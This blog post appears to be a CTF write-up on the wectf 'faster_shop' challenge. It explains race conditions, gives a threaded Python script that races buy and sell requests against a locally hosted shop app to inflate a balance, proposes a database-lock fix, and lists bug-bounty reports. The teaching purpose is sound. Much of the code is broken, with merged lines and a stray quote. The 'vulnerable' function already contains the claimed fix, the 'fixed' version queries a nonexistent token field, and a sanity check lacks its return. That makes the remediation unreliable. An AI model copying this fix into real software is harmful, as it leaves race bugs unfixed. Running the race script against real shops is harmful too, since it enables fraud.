Exploiting and Fixing a Race Condition Problem

Published in

Sinch Blog

8 min readJun 22, 2020

Recently I participated in the wectf and had the chance to face some really cool security challenges. In one of the challenges, called faster_shop, we needed to exploit a race condition solve the challenge. Cool, right?

The Happy Path

Before talking about race conditions and how to fix it, lets explore the happy path of the problem a bit. Thankfully the author of this challenge provided a Dockerfile [1] for the ones who want to reproduce it later.

git clone https://github.com/shouc/wectf-2020.git
cd wectf-2020/faster_shop
docker build . -t local/faster_shop
docker run -it --rm -p 1002:1002 local/faster_shop

Now if you go to your browser on http://localhost:1002 you will see this page

Just enter any login and password and the application will accept it. Now that you are logged in you will see the “buying page” where we want to buy that Fancy Flag. Sadly we only have 20 bucks, and the flag costs 21.

The only other possibility is to buy and sell Galois Milk or Alpaca Salad, but with these options our balance will never go above 20 bucks. We must exploit some vulnerability on this system to go above 20 bucks and buy the Fancy Flag.

Race Conditions

Race condition is a category of vulnerabilities where two agents competes for some resource, and because the timing was just right the output is different from the expected. One of the most famous race conditions exploits is Dirty Cow [6], where a race condition manages to edit a file that wasn’t supposed to be edited, giving root to the attacker.

I’ll use an example that will help us later with the challenge. Imagine the following scenario, there is a bank with two employees that make withdraws in accounts, they receive the following algorithm of execution.

Since we have a gap between the time when someone reads your balance and the time someone updates your balance, we can trigger a race condition by asking for two employees to withdraw some money at the same time. The timeline would be like this:

And this works because there is a time gap between reading some information, and updating it.

Exploiting The System

Since this is an article about race conditions, and since I’ve spent an entire section to explain how it works, let’s put it in action in this challenge. The first thing to do is to set a strategy, in this case we will try to buy a product and then sell it two times. If we succeed, our balance will go above 20 bucks, and we will be finally able to buy that Fancy Flag.

Now that we have a strategy, we need to understand how to programmatically buy and sell products. There is no need for fancy tools here, just use your browser developer tools and take a look at the requests ([2] and [3] are good materials). You’ll see that the requests to buy and sell are:

#:TOKEN, your token assigned on login# To buy
# PRODUCT_ID, 1 -> Milk, 2 -> Soup, 3 -> FlagPOST /buy/:PRODUCT_ID HTTP/1.0
Cookie: token=:TOKEN
# To sellPOST /sell/:TRANSACTION_ID HTTP/1.0
Cookie: token=:TOKEN

Knowing the requests necessary to buy and sell products in the system, we can use a scripting language like python3 to build an exploit. In this case we will use the requests [4] library to make everything as easy as possible. If you try to replicate the requests on python you will get something like this:

#!/bin/python3from requests import postdef buy(token, id):
  cookies = {"token": token"}
  return post("http://localhost:1002/buy/"+id, cookies=cookies)def sell(token, id):
  cookies = {"token": token"}
  return post("http://localhost:1002/sell/"+id, cookies=cookies)

Now we need a way to buy one time and sell multiple times. While playing wectf I just spawned multiple instances of buying scripts and manually bought some milk, but since we have time now I’ll use threads [5] to make this nice and clean. There will be one thread buying milk, and N threads selling milk, a code to do so will look like this:

import threading
import timeclass Buyer(threading.Thread):  def run(self):
    while True:
      print("Buying milk...")
      buy(token, "1")
      time.sleep(500)class Seller(threading.Thread):  def run(self):
    while True:
      Some code that find the id
      id = 1
      sell(token, id)

Now we just need to make a function to find the first transaction id and spawn the threads. The resulting code will be close to this:

#!/bin/python3# Global Variables - Byte metoken = "117af0c5-cf67-4057-b982-bcba4d7ef2b4"
N = 20# Communication with the appfrom requests import post, getdef buy(token, id):
  cookies = {"token": token}
  return post("http://localhost:1002/buy/"+id, cookies=cookies)def sell(token, id):
  cookies = {"token": token}
  return post("http://localhost:1002/sell/"+id, cookies=cookies)def find_id(token):
  cookies = {"token": token}
  body = get("http://localhost:1002", cookies=cookies).text
  return body.split("<form action=\"/sell/")[1].split("\" method=\"post\">")[0] # Threads Classesimport threading
import timeclass Buyer(threading.Thread):def run(self):
    while True:
      print("Buying milk...")
      buy(token, "1")
      time.sleep(2)class Seller(threading.Thread):def run(self):
    while True:
      # Some code that find the id
      try:
        id = find_id(token)
        print("Selling Milk..")
        sell(token, id)
      except:
        passif __name__ == "__main__":
  b = Buyer()
  b.start()
  sellers = []
  for _ in range(N):
    sellers.append(Seller())
    sellers[-1].start()

After running the script above for some seconds and reloading the page, you will encounter something like this:

Now we can sell the extra milk and buy that Fancy Flag that we couldn't before.

Fixing the System

We are going to try to fix the /sell endpoint since this is the one we exploited in this article, the /buy endpoint is also vulnerable to race conditions and it is a great exercise to practice what we are covering here. This is the vulnerable code:

@staticmethod
@db.connection_context()
def sell(token: str, purchase_id: int) -> (bool, str):
  user_objs = User \
  .select() \
  .where(User.token == token)
  
  if len(user_objs) == 0:
    return False, "Wrong Token"  user_obj = user_objs[0]
  lock_val = uuid.uuid1()  got_lock = PurchaseLog \
  .update(lock=lock_val) \
  .where(PurchaseLog.id == purchase_id) \
  .where(PurchaseLog.user_id == user_obj.id) \
  .where(PurchaseLog.lock == "") \
  .execute()  if got_lock != 1:
    return False, "Item not found, or lock not aquired"  purchases = PurchaseLog\
    .select()\
    .where(PurchaseLog.id == purchase_id)
    
  purchase = purchases[0]  #sanity check
  if lock_val != purchase.lock:
    False, "Lock sanity check failed"  PurchaseLog\
    .delete()\
    .where(PurchaseLog.id == purchase_id)\
    .execute()  User \
  .update(balance=user_obj.balance + purchase.paid_amount) \
  .where(User.id == user_obj.id) \
  .execute()  if purchase.paid_amount == 21:
    return False, f"Well, flag is {os.getenv('FLAG')}"return True, ""

Putting it into simplified terms, this code is doing the following:

Check if the purchased item exists
Checking if you are logged in
Checking if you own the purchased item
Delete the purchased item
Updates your balance

This is the perfect scenario for a race condition problem, let’s first reduce a little the attack surface (in this case the attack surface is the time between transactions). The first thing to do is to move the login verification to the top of the list and merge the two checks of existence and ownership of the purchase. So the new order is:

Check if you are logged in
Check if the purchase exists and if you are the owner of it
Delete the item
Updates your balance

This alone reduces a lot the attack surface, but does not eliminate the vulnerability. Since there is a gap between checking if the item belongs to the user, removing the item, and changing the balance, there is still room for a race condition.

We will solve it implementing a lock into the schema of the table transactions, so when we try to sell a item registered in a transaction, it will check for the lock. In the code that defines a transactions (line 22 of app.py), insert a field called lock

class PurchaseLog(Model):
  id = AutoField()
  user_id = IntegerField()
  product_id = IntegerField()
  paid_amount = IntegerField()
  v_date = DateField(default=datetime.datetime.now)
  lock = CharField()    class Meta:
    database = db

and on line 125 of app.py

try:
  PurchaseLog.create(
    user_id=user_obj.id,
    product_id=product_obj.id,
    paid_amount=product_obj.price,
    lock = ""
  )

Now that we have our lock implemented, the order of activities should be like:

Check if you are logged in
Check if the row is locked
Lock the row
Check if the purchase exists and if you are the owner of it
Delete the item
Updates your balance

Although we reduced the time frame to a minimum, there is still a time frame between reading the lock and acquiring the lock. In this scenarios where you need to look at a lock and acquire the lock, you need atomicity in the operation to guarantee that there is no race condition between reading and acquiring the lock.

We can reach this atomicity by using a update where lock == “”, and voyla, race condition is no more. This is the resulting code:

@staticmethod
@db.connection_context()
def sell(token: str, purchase_id: int) -> (bool, str):
  user_objs = User \
  .select() \
  .where(User.token == token)  if len(user_objs) == 0:
    return False, "Wrong Token"  user_obj = user_objs[0]
  lock_val = uuid.uuid1()
  
  #got_lock is the number of lines updated
  got_lock = PurchaseLog \
  .update(lock=lock_val) \
  .where(PurchaseLog.id == purchase_id) \
  .where(PurchaseLog.user_id == user_obj.id) \
  .where(PurchaseLog.token == "") \
  .execute()  if got_lock != 1:
    return False, "Item not found, or lock not aquired"  purchases = PurchaseLog\
    .select()\
    .where(PurchaseLog.id == purchase_id)  purchase = purchases[0]  #sanity check
  if lock_val != purchase.lock:
    False, "Lock sanity check failed"  PurchaseLog\
    .delete()\
    .where(PurchaseLog.id == purchase_id)\
    .execute()  User \
    .update(balance=user_obj.balance + purchase.paid_amount) \
    .where(User.id == user_obj.id) \
    .execute()  if purchase.paid_amount == 21:
    return False, f"Well, flag is {os.getenv('FLAG')}"
    
  return True, ""

I let the same exploit we used last time running all night and it did not worked at all =D

Applicability

Most people are skeptical about security challenges saying that they have little to none applicability in real life scenarios, but not in this case, race conditions are a real threat for every multi threaded program or distributed system. I will list here some reports from race condition related problems:

$15,200.00 — Shopify — https://hackerone.com/reports/300305

$10,000.00 — Flash — https://hackerone.com/reports/37240

$2,100.00 — HackerOne — https://hackerone.com/reports/429026

$150.00 — Slack — https://hackerone.com/reports/165570

Another huge market for this kind of flaw is Massive Online Multiplayer (MMO) games. Since they usually handle with a lot of asynchronous requests and have a ton of parallel processing, race conditions are something easy to happen. I will let a video down here of a talk in defcon that cover this topic and some others more.